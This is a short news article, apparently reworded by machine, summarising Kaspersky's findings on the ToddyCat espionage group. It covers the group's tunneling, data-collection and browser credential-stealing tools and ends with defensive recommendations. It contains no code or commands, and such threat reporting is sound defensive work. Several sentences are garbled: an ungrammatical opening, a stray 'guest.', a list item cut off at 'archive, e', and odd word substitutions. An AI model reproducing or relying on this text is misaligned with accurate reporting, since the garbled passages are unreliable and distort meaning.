The menacing actor known as ToddyCat a wide range of tools have been observed to be used to maintain access to compromised environments and steal valuable data.
Russian cybersecurity firm Kaspersky described the adversary as relying on various programs to collect “industrial-scale” data from primarily government organizations, some of them defense-related, located in the Asia-Pacific region.
“To collect large volumes of data from many hosts, attackers must automate the data collection process as much as possible and provide several alternative means of continuously accessing and monitoring the systems they attack,” security researchers Andrey Gunkin, Alexander Fedotov and Natalya Shornikova said.
ToddyCat was first documented by the company in June 2022 in connection with a series of cyberattacks targeting government and military entities in Europe and Asia starting at least December 2020. These intrusions leveraged a passive backdoor called Samurai that allows the remote access to compromised resources. guest.
Since then, a closer examination of the threat actor’s business prowess has uncovered additional data exfiltration tools such as LoFiSe and Pcexter to collect data and upload archive files to Microsoft OneDrive.
The latest set of programs involves a mix of tunneling data collection software, which are used after the attacker has already gained access to privileged user accounts on the infected system. This includes –
- Reverse SSH tunnel using OpenSSH
- SoftEther VPN, which is renamed to seemingly harmless files such as “boot.exe”, “mstime.exe”, “netscan.exe” and “kaspersky.exe”
- Ngrok and Krong to encrypt and redirect command and control (C2) traffic to a certain port on the target system
- FRP client, an open source fast reverse proxy based on Golang
- Cuthead, a .NET compiled executable to search for documents that match a specific extension or file name or the date they are modified
- WAExp, a .NET program for capturing data associated with the WhatsApp web app and saving it as archive, e
- TomBerBil to extract cookies and credentials from web browsers such as Google Chrome and Microsoft Edge
“Attackers actively use techniques to bypass defenses in an attempt to disguise their presence in the system,” Kaspersky said.
“To protect your organization’s infrastructure, we recommend adding resources and IP addresses of cloud services that provide traffic tunneling to your firewall’s deny list. Additionally, users should be advised to avoid storing passwords in their browsers , as this helps attackers access sensitive information.”